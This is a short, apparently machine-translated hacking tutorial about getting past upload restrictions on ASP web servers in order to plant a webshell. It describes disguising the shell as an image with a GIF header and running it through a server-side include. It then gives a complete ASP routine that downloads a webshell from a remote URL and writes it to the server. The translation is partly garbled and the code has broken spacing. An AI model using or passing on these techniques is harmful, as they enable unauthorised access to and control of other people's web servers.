Some ways to break through abnormal restrictions
Author: fallen leaves (www.yzteam.net)
Content:
Big Horse transfer restriction Solution
Add GIF98A
First, change the Trojan to the image format.
Then use
<! -- # Include file = "55.jpg" -->
Image to call
You can execute
It's easy.
You can also download the SHELL remotely. The Code is as follows:
<%
Sub eWebEditor_SaveRemoteFile (s_LocalFileName, s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server. CreateObject ("Microsoft. XMLHTTP ")
With Retrieval
. Open "Get", s_RemoteFileUrl, False ,"",""
. Send
GetRemoteData =. ResponseBody
End
Set Retrieval = Nothing
Set Ads = Server. CreateObject ("Adodb. Stream ")
With Ads
. Type = 1
. Open
. Write GetRemoteData
. SaveToFile Server. MapPath (s_LocalFileName), 2
. Cancel ()
. Close ()
End
Set Ads = Nothing
End Sub
EWebEditor_SaveRemoteFile "Name of the Trojan file to be saved, for example, (x. TXT) Note: Do not upload the ASP suffix. Otherwise, the remote download SHELL only has the login page", "The SHELL address to download"
%>